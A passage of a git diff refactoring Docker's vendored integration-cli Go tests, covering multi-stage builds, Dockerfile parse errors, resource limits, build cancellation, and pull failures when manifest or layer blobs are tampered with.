dockerfile = ` + FROM build1:latest + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 c:\\bar / + COPY foo /` + ctx = fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "def", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + out := cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\bar").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "abc") + out = cli.DockerCmd(c, "run", "build2", "cmd.exe", "/s", "/c", "type", "c:\\foo").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "def") +} + +func (s *DockerSuite) TestBuildCopyFromForbidWindowsSystemPaths(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 %s c:\\oscopy + ` + exp := icmd.Expected{ + ExitCode: 1, + Err: "copy from c:\\ or c:\\windows is not allowed on windows", + } + buildImage("testforbidsystempaths1", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "C:\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\windows"))).Assert(c, exp) + buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:\\\\wInDows"))).Assert(c, exp) +} + +func (s *DockerSuite) TestBuildCopyFromForbidWindowsRelativePaths(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 %s c:\\oscopy + ` + exp := icmd.Expected{ + ExitCode: 1, + Err: "copy from c:\\ or c:\\windows is not allowed on windows", + } + buildImage("testforbidsystempaths1", build.WithDockerfile(fmt.Sprintf(dockerfile, "c:"))).Assert(c, exp) + buildImage("testforbidsystempaths2", build.WithDockerfile(fmt.Sprintf(dockerfile, "."))).Assert(c, exp) + buildImage("testforbidsystempaths3", build.WithDockerfile(fmt.Sprintf(dockerfile, "..\\\\"))).Assert(c, exp) + buildImage("testforbidsystempaths4", build.WithDockerfile(fmt.Sprintf(dockerfile, ".\\\\windows"))).Assert(c, exp) + buildImage("testforbidsystempaths5", build.WithDockerfile(fmt.Sprintf(dockerfile, "\\\\windows"))).Assert(c, exp) +} + +func (s *DockerSuite) TestBuildCopyFromWindowsIsCaseInsensitive(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY foo / + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY --from=0 c:\\fOo c:\\copied + RUN type c:\\copied + ` + cli.Docker(cli.Build("copyfrom-windows-insensitive"), build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile("foo", "hello world"), + )).Assert(c, icmd.Expected{ + ExitCode: 0, + Out: "hello world", + }) +} + +// #33176 +func (s *DockerSuite) TestBuildMulitStageResetScratch(c *check.C) { + testRequires(c, DaemonIsLinux) + + dockerfile := ` + FROM busybox + WORKDIR /foo/bar + FROM scratch + ENV FOO=bar + ` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + res := cli.InspectCmd(c, "build1", cli.Format(".Config.WorkingDir")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, "") +} + +func (s *DockerSuite) TestBuildIntermediateTarget(c *check.C) { + //todo: need to be removed after 18.06 release + if strings.Contains(testEnv.DaemonInfo.ServerVersion, "18.05.0") { + c.Skip(fmt.Sprintf("Bug fixed in 18.06 or higher.Skipping it for %s", testEnv.DaemonInfo.ServerVersion)) + } + dockerfile := ` + FROM busybox AS build-env + CMD ["/dev"] + FROM busybox + CMD ["/dist"] + ` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(dockerfile)) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "build-env")) + + res := cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`) + + // Stage name is case-insensitive by design + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "BUIld-EnV")) + + res = cli.InspectCmd(c, "build1", cli.Format("json .Config.Cmd")).Combined() + c.Assert(strings.TrimSpace(res), checker.Equals, `["/dev"]`) + + result := cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx), + cli.WithFlags("--target", "nosuchtarget")) + result.Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "failed to reach build target", + }) } // TestBuildOpaqueDirectory tests that a build succeeds which @@ -7271,7 +5992,6 @@ func (s *DockerSuite) TestBuildContChar(c *check.C) { // See https://github.com/docker/docker/issues/25244 func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { testRequires(c, DaemonIsLinux) - dockerFile := ` FROM busybox RUN mkdir /dir1 && touch /dir1/f1 @@ -7279,28 +5999,22 @@ func (s *DockerSuite) TestBuildOpaqueDirectory(c *check.C) { RUN touch /dir1/f3 RUN [ -f /dir1/f2 ] ` - // Test that build succeeds, last command fails if opaque directory // was not handled correctly - _, err := buildImage("testopaquedirectory", dockerFile, false) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, "testopaquedirectory", build.WithDockerfile(dockerFile)) } // Windows test for USER in dockerfile func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildwindowsuser" - _, out, err := buildImageWithOut(name, - `FROM `+WindowsBaseImage+` + buildImage(name, build.WithDockerfile(`FROM `+testEnv.PlatformDefaults.BaseImage+` RUN net user user /add USER user RUN set username - `, - true) - if err != nil { - c.Fatal(err) - } - c.Assert(strings.ToLower(out), checker.Contains, "username=user") + `)).Assert(c, icmd.Expected{ + Out: "USERNAME=user", + }) } // Verifies if COPY file . when WORKDIR is set to a non-existing directory, @@ -7310,83 +6024,186 @@ func (s *DockerSuite) TestBuildWindowsUser(c *check.C) { // Note 27545 was reverted in 28505, but a new fix was added subsequently in 28514. func (s *DockerSuite) TestBuildCopyFileDotWithWorkdir(c *check.C) { name := "testbuildcopyfiledotwithworkdir" - ctx, err := fakeContext(`FROM busybox -WORKDIR /foo -COPY file . -RUN ["cat", "/foo/file"] -`, - map[string]string{}) - - if err != nil { - c.Fatal(err) - } - defer ctx.Close() - - if err := ctx.Add("file", "content"); err != nil { - c.Fatal(err) - } - - if _, err = buildImageFromContext(name, ctx, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", `FROM busybox +WORKDIR /foo +COPY file . +RUN ["cat", "/foo/file"] +`), + build.WithFile("file", "content"), + )) } // Case-insensitive environment variables on Windows func (s *DockerSuite) TestBuildWindowsEnvCaseInsensitive(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildwindowsenvcaseinsensitive" - if _, err := buildImage(name, ` - FROM `+WindowsBaseImage+` - ENV FOO=bar foo=bar - `, true); err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithDockerfile(` + FROM `+testEnv.PlatformDefaults.BaseImage+` + ENV FOO=bar foo=baz + `)) res := inspectFieldJSON(c, name, "Config.Env") - if res != `["foo=bar"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped. + if res != `["foo=baz"]` { // Should not have FOO=bar in it - takes the last one processed. And only one entry as deduped. c.Fatalf("Case insensitive environment variables on Windows failed. Got %s", res) } } // Test case for 29667 func (s *DockerSuite) TestBuildWorkdirImageCmd(c *check.C) { - testRequires(c, DaemonIsLinux) - image := "testworkdirimagecmd" - dockerfile := ` + buildImageSuccessfully(c, image, build.WithDockerfile(` FROM busybox WORKDIR /foo/bar -` - out, err := buildImage(image, dockerfile, true) - c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) +`)) + out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + // The Windows busybox image has a blank `cmd` + lookingFor := `["sh"]` + if testEnv.OSType == "windows" { + lookingFor = "null" + } + c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor) image = "testworkdirlabelimagecmd" - dockerfile = ` + buildImageSuccessfully(c, image, build.WithDockerfile(` FROM busybox WORKDIR /foo/bar LABEL a=b -` - out, err = buildImage(image, dockerfile, true) - c.Assert(err, checker.IsNil, check.Commentf("Output: %s", out)) +`)) out, _ = dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", image) - c.Assert(strings.TrimSpace(out), checker.Equals, `["sh"]`) + c.Assert(strings.TrimSpace(out), checker.Equals, lookingFor) } -// Test case for 28902/28090 +// Test case for 28902/28909 func (s *DockerSuite) TestBuildWorkdirCmd(c *check.C) { testRequires(c, DaemonIsLinux) - + name := "testbuildworkdircmd" dockerFile := ` - FROM golang:1.7-alpine + FROM busybox WORKDIR / ` - _, err := buildImage("testbuildworkdircmd", dockerFile, true) - c.Assert(err, checker.IsNil) + buildImageSuccessfully(c, name, build.WithDockerfile(dockerFile)) + result := buildImage(name, build.WithDockerfile(dockerFile)) + result.Assert(c, icmd.Success) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorOnBuild(c *check.C) { + name := "test_build_line_error_onbuild" + buildImage(name, build.WithDockerfile(`FROM busybox + ONBUILD + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 2: ONBUILD requires at least one argument", + }) +} - _, out, err := buildImageWithOut("testbuildworkdircmd", dockerFile, true) - c.Assert(err, checker.IsNil) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 1) +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorUnknownInstruction(c *check.C) { + name := "test_build_line_error_unknown_instruction" + cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox + RUN echo hello world + NOINSTRUCTION echo ba + RUN echo hello + ERROR + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 3: unknown instruction: NOINSTRUCTION", + }) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorWithEmptyLines(c *check.C) { + name := "test_build_line_error_with_empty_lines" + cli.Docker(cli.Build(name), build.WithDockerfile(` + FROM busybox + + RUN echo hello world + + NOINSTRUCTION echo ba + + CMD ["/bin/init"] + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 6: unknown instruction: NOINSTRUCTION", + }) +} + +// FIXME(vdemeester) should be a unit test +func (s *DockerSuite) TestBuildLineErrorWithComments(c *check.C) { + name := "test_build_line_error_with_comments" + cli.Docker(cli.Build(name), build.WithDockerfile(`FROM busybox + # This will print hello world + # and then ba + RUN echo hello world + NOINSTRUCTION echo ba + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "Dockerfile parse error line 5: unknown instruction: NOINSTRUCTION", + }) +} + +// #31957 +func (s *DockerSuite) TestBuildSetCommandWithDefinedShell(c *check.C) { + buildImageSuccessfully(c, "build1", build.WithDockerfile(` +FROM busybox +SHELL ["/bin/sh", "-c"] +`)) + buildImageSuccessfully(c, "build2", build.WithDockerfile(` +FROM build1 +CMD echo foo +`)) + + out, _ := dockerCmd(c, "inspect", "--format", "{{ json .Config.Cmd }}", "build2") + c.Assert(strings.TrimSpace(out), checker.Equals, `["/bin/sh","-c","echo foo"]`) +} + +// FIXME(vdemeester) should migrate to docker/cli tests +func (s *DockerSuite) TestBuildIidFile(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestBuildIidFile") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpIidFile := filepath.Join(tmpDir, "iid") + + name := "testbuildiidfile" + // Use a Dockerfile with multiple stages to ensure we get the last one + cli.BuildCmd(c, name, + build.WithDockerfile(`FROM `+minimalBaseImage()+` AS stage1 +ENV FOO FOO +FROM `+minimalBaseImage()+` +ENV BAR BAZ`), + cli.WithFlags("--iidfile", tmpIidFile)) + + id, err := ioutil.ReadFile(tmpIidFile) + c.Assert(err, check.IsNil) + d, err := digest.Parse(string(id)) + c.Assert(err, check.IsNil) + c.Assert(d.String(), checker.Equals, getIDByName(c, name)) +} + +// FIXME(vdemeester) should migrate to docker/cli tests +func (s *DockerSuite) TestBuildIidFileCleanupOnFail(c *check.C) { + tmpDir, err := ioutil.TempDir("", "TestBuildIidFileCleanupOnFail") + if err != nil { + c.Fatal(err) + } + defer os.RemoveAll(tmpDir) + tmpIidFile := filepath.Join(tmpDir, "iid") + + err = ioutil.WriteFile(tmpIidFile, []byte("Dummy"), 0666) + c.Assert(err, check.IsNil) + + cli.Docker(cli.Build("testbuildiidfilecleanuponfail"), + build.WithDockerfile(`FROM `+minimalBaseImage()+` + RUN /non/existing/command`), + cli.WithFlags("--iidfile", tmpIidFile)).Assert(c, icmd.Expected{ + ExitCode: 1, + }) + _, err = os.Stat(tmpIidFile) + c.Assert(err, check.NotNil) + c.Assert(os.IsNotExist(err), check.Equals, true) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go index 0205a927dd..8cad28f457 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_build_unix_test.go @@ -12,30 +12,33 @@ import ( "path/filepath" "regexp" "strings" + "syscall" "time" - "github.com/docker/docker/pkg/integration" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" + "github.com/docker/docker/internal/test/fakecontext" "github.com/docker/go-units" "github.com/go-check/check" + "gotest.tools/icmd" ) func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { testRequires(c, cpuCfsQuota) name := "testbuildresourceconstraints" + buildLabel := "DockerSuite.TestBuildResourceConstraintsAreUsed" - ctx, err := fakeContext(` + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile(` FROM hello-world:frozen RUN ["/hello"] - `, map[string]string{}) - c.Assert(err, checker.IsNil) - - _, _, err = dockerCmdInDir(c, ctx.Dir, "build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "-t", name, ".") - if err != nil { - c.Fatal(err) - } + `)) + cli.Docker( + cli.Args("build", "--no-cache", "--rm=false", "--memory=64m", "--memory-swap=-1", "--cpuset-cpus=0", "--cpuset-mems=0", "--cpu-shares=100", "--cpu-quota=8000", "--ulimit", "nofile=42", "--label="+buildLabel, "-t", name, "."), + cli.InDir(ctx.Dir), + ).Assert(c, icmd.Success) - out, _ := dockerCmd(c, "ps", "-lq") + out := cli.DockerCmd(c, "ps", "-lq", "--filter", "label="+buildLabel).Combined() cID := strings.TrimSpace(out) type hostConfig struct { @@ -51,7 +54,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { cfg := inspectFieldJSON(c, cID, "HostConfig") var c1 hostConfig - err = json.Unmarshal([]byte(cfg), &c1) + err := json.Unmarshal([]byte(cfg), &c1) c.Assert(err, checker.IsNil, check.Commentf(cfg)) c.Assert(c1.Memory, checker.Equals, int64(64*1024*1024), check.Commentf("resource constraints not set properly for Memory")) @@ -64,7 +67,7 @@ func (s *DockerSuite) TestBuildResourceConstraintsAreUsed(c *check.C) { c.Assert(c1.Ulimits[0].Hard, checker.Equals, int64(42), check.Commentf("resource constraints not set properly for Ulimits")) // Make sure constraints aren't saved to image - dockerCmd(c, "run", "--name=test", name) + cli.DockerCmd(c, "run", "--name=test", name) cfg = inspectFieldJSON(c, "test", "HostConfig") @@ -85,7 +88,7 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { testRequires(c, DaemonIsLinux) name := "testbuildaddown" - ctx := func() *FakeContext { + ctx := func() *fakecontext.Fake { dockerfile := ` FROM busybox ADD foo /bar/ @@ -100,24 +103,20 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { } defer testFile.Close() - chownCmd := exec.Command("chown", "daemon:daemon", "foo") - chownCmd.Dir = tmpDir - out, _, err := runCommandWithOutput(chownCmd) - if err != nil { - c.Fatal(err, out) - } + icmd.RunCmd(icmd.Cmd{ + Command: []string{"chown", "daemon:daemon", "foo"}, + Dir: tmpDir, + }).Assert(c, icmd.Success) if err := ioutil.WriteFile(filepath.Join(tmpDir, "Dockerfile"), []byte(dockerfile), 0644); err != nil { c.Fatalf("failed to open destination dockerfile: %v", err) } - return fakeContextFromDir(tmpDir) + return fakecontext.New(c, tmpDir) }() defer ctx.Close() - if _, err := buildImageFromContext(name, ctx, true); err != nil { - c.Fatalf("build failed to complete for TestBuildAddChangeOwnership: %v", err) - } + buildImageSuccessfully(c, name, build.WithExternalBuildContext(ctx)) } // Test that an infinite sleep during a build is killed if the client disconnects. @@ -127,8 +126,12 @@ func (s *DockerSuite) TestBuildAddChangeOwnership(c *check.C) { // * Run a 1-year-long sleep from a docker build. // * When docker events sees container start, close the "docker build" command // * Wait for docker events to emit a dying event. +// +// TODO(buildkit): this test needs to be rewritten for buildkit. +// It has been manually tested positive. Confirmed issue: docker build output parsing. +// Potential issue: newEventObserver uses docker events, which is not hooked up to buildkit. func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, TODOBuildkit) name := "testbuildcancellation" observer, err := newEventObserver(c) @@ -138,19 +141,23 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { defer observer.Stop() // (Note: one year, will never finish) - ctx, err := fakeContext("FROM busybox\nRUN sleep 31536000", nil) - if err != nil { - c.Fatal(err) - } + ctx := fakecontext.New(c, "", fakecontext.WithDockerfile("FROM busybox\nRUN sleep 31536000")) defer ctx.Close() buildCmd := exec.Command(dockerBinary, "build", "-t", name, ".") buildCmd.Dir = ctx.Dir stdoutBuild, err := buildCmd.StdoutPipe() + c.Assert(err, checker.IsNil) + if err := buildCmd.Start(); err != nil { c.Fatalf("failed to run build: %s", err) } + // always clean up + defer func() { + buildCmd.Process.Kill() + buildCmd.Wait() + }() matchCID := regexp.MustCompile("Running in (.+)") scanner := bufio.NewScanner(stdoutBuild) @@ -194,7 +201,7 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { } // Get the exit status of `docker build`, check it exited because killed. - if err := buildCmd.Wait(); err != nil && !integration.IsKilled(err) { + if err := buildCmd.Wait(); err != nil && !isKilled(err) { c.Fatalf("wait failed during build run: %T %s", err, err) } @@ -205,3 +212,17 @@ func (s *DockerSuite) TestBuildCancellationKillsSleep(c *check.C) { // ignore, done } } + +func isKilled(err error) bool { + if exitErr, ok := err.(*exec.ExitError); ok { + status, ok := exitErr.Sys().(syscall.WaitStatus) + if !ok { + return false + } + // status.ExitStatus() is required on Windows because it does not + // implement Signal() nor Signaled(). Just check it had a bad exit + // status could mean it was killed (and in tests we do kill) + return (status.Signaled() && status.Signal() == os.Kill) || status.ExitStatus() != 0 + } + return false +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go index c2d85461a8..006cf11e1a 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_by_digest_test.go @@ -8,13 +8,16 @@ import ( "regexp" "strings" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema1" "github.com/docker/distribution/manifest/schema2" "github.com/docker/docker/api/types" - "github.com/docker/docker/pkg/integration/checker" - "github.com/docker/docker/pkg/stringutils" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var ( @@ -31,24 +34,23 @@ func setupImage(c *check.C) (digest.Digest, error) { func setupImageWithTag(c *check.C, tag string) (digest.Digest, error) { containerName := "busyboxbydigest" - dockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox") + // new file is committed because this layer is used for detecting malicious + // changes. if this was committed as empty layer it would be skipped on pull + // and malicious changes would never be detected. + cli.DockerCmd(c, "run", "-e", "digest=1", "--name", containerName, "busybox", "touch", "anewfile") // tag the image to upload it to the private registry repoAndTag := repoName + ":" + tag - out, _, err := dockerCmdWithError("commit", containerName, repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("image tagging failed: %s", out)) + cli.DockerCmd(c, "commit", containerName, repoAndTag) // delete the container as we don't need it any more - err = deleteContainer(containerName) - c.Assert(err, checker.IsNil) + cli.DockerCmd(c, "rm", "-fv", containerName) // push the image - out, _, err = dockerCmdWithError("push", repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("pushing the image to the private registry has failed: %s", out)) + out := cli.DockerCmd(c, "push", repoAndTag).Combined() // delete our local repo that we previously tagged - rmiout, _, err := dockerCmdWithError("rmi", repoAndTag) - c.Assert(err, checker.IsNil, check.Commentf("error deleting images prior to real test: %s", rmiout)) + cli.DockerCmd(c, "rmi", repoAndTag) matches := pushDigestRegex.FindStringSubmatch(out) c.Assert(matches, checker.HasLen, 2, check.Commentf("unable to parse digest from push output: %s", out)) @@ -193,10 +195,9 @@ func (s *DockerRegistrySuite) TestBuildByDigest(c *check.C) { // do the build name := "buildbydigest" - _, err = buildImage(name, fmt.Sprintf( + buildImageSuccessfully(c, name, build.WithDockerfile(fmt.Sprintf( `FROM %s - CMD ["/bin/echo", "Hello World"]`, imageReference), - true) + CMD ["/bin/echo", "Hello World"]`, imageReference))) c.Assert(err, checker.IsNil) // get the build's image id @@ -403,10 +404,12 @@ func (s *DockerRegistrySuite) TestInspectImageWithDigests(c *check.C) { c.Assert(err, checker.IsNil) c.Assert(imageJSON, checker.HasLen, 1) c.Assert(imageJSON[0].RepoDigests, checker.HasLen, 1) - c.Assert(stringutils.InSlice(imageJSON[0].RepoDigests, imageReference), checker.Equals, true) + assert.Check(c, is.Contains(imageJSON[0].RepoDigests, imageReference)) } func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c *check.C) { + existingContainers := ExistingContainerIDs(c) + digest, err := setupImage(c) c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) @@ -417,20 +420,17 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c // build an image from it imageName1 := "images_ps_filter_test" - _, err = buildImage(imageName1, fmt.Sprintf( + buildImageSuccessfully(c, imageName1, build.WithDockerfile(fmt.Sprintf( `FROM %s - LABEL match me 1`, imageReference), true) - c.Assert(err, checker.IsNil) + LABEL match me 1`, imageReference))) // run a container based on that dockerCmd(c, "run", "--name=test1", imageReference, "echo", "hello") - expectedID, err := getIDByName("test1") - c.Assert(err, check.IsNil) + expectedID := getIDByName(c, "test1") // run a container based on the a descendant of that too dockerCmd(c, "run", "--name=test2", imageName1, "echo", "hello") - expectedID1, err := getIDByName("test2") - c.Assert(err, check.IsNil) + expectedID1 := getIDByName(c, "test2") expectedIDs := []string{expectedID, expectedID1} @@ -441,7 +441,7 @@ func (s *DockerRegistrySuite) TestPsListContainersFilterAncestorImageByDigest(c // Valid imageReference out, _ = dockerCmd(c, "ps", "-a", "-q", "--no-trunc", "--filter=ancestor="+imageReference) - checkPsAncestorFilterOutput(c, out, imageReference, expectedIDs) + checkPsAncestorFilterOutput(c, RemoveOutputForExistingElements(out, existingContainers), imageReference, expectedIDs) } func (s *DockerRegistrySuite) TestDeleteImageByIDOnlyPulledByDigest(c *check.C) { @@ -533,7 +533,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema2.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -544,13 +544,13 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredManifest(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, manifestDigest) + undo := s.reg.TempMoveBlobData(c, manifestDigest) defer undo() alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) - s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob) // Now try pulling that image by digest. We should get an error about // digest verification for the manifest digest. @@ -573,7 +573,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C c.Assert(err, checker.IsNil, check.Commentf("error setting up image")) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema1.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -586,13 +586,13 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredManifest(c *check.C // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, manifestDigest) + undo := s.reg.TempMoveBlobData(c, manifestDigest) defer undo() alteredManifestBlob, err := json.MarshalIndent(imgManifest, "", " ") c.Assert(err, checker.IsNil, check.Commentf("unable to encode altered image manifest to JSON")) - s.reg.writeBlobContents(c, manifestDigest, alteredManifestBlob) + s.reg.WriteBlobContents(c, manifestDigest, alteredManifestBlob) // Now try pulling that image by digest. We should get an error about // digest verification for the manifest digest. @@ -615,7 +615,7 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { c.Assert(err, checker.IsNil) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema2.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -626,17 +626,17 @@ func (s *DockerRegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + undo := s.reg.TempMoveBlobData(c, targetLayerDigest) defer undo() // Now make a fake data blob in this directory. - s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) // Now try pulling that image by digest. We should get an error about // digest verification for the target layer digest. // Remove distribution cache to force a re-pull of the blobs - if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil { c.Fatalf("error clearing distribution cache: %v", err) } @@ -658,7 +658,7 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { c.Assert(err, checker.IsNil) // Load the target manifest blob. - manifestBlob := s.reg.readBlobContents(c, manifestDigest) + manifestBlob := s.reg.ReadBlobContents(c, manifestDigest) var imgManifest schema1.Manifest err = json.Unmarshal(manifestBlob, &imgManifest) @@ -669,17 +669,17 @@ func (s *DockerSchema1RegistrySuite) TestPullFailsWithAlteredLayer(c *check.C) { // Move the existing data file aside, so that we can replace it with a // malicious blob of data. NOTE: we defer the returned undo func. - undo := s.reg.tempMoveBlobData(c, targetLayerDigest) + undo := s.reg.TempMoveBlobData(c, targetLayerDigest) defer undo() // Now make a fake data blob in this directory. - s.reg.writeBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) + s.reg.WriteBlobContents(c, targetLayerDigest, []byte("This is not the data you are looking for.")) // Now try pulling that image by digest. We should get an error about // digest verification for the target layer digest. // Remove distribution cache to force a re-pull of the blobs - if err := os.RemoveAll(filepath.Join(dockerBasePath, "image", s.d.storageDriver, "distribution")); err != nil { + if err := os.RemoveAll(filepath.Join(testEnv.DaemonInfo.DockerRootDir, "image", s.d.StorageDriver(), "distribution")); err != nil { c.Fatalf("error clearing distribution cache: %v", err) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go index 8008ae1716..79c5f73156 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_commit_test.go @@ -3,22 +3,24 @@ package main import ( "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/api/types/versions" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" "github.com/go-check/check" ) func (s *DockerSuite) TestCommitAfterContainerIsDone(c 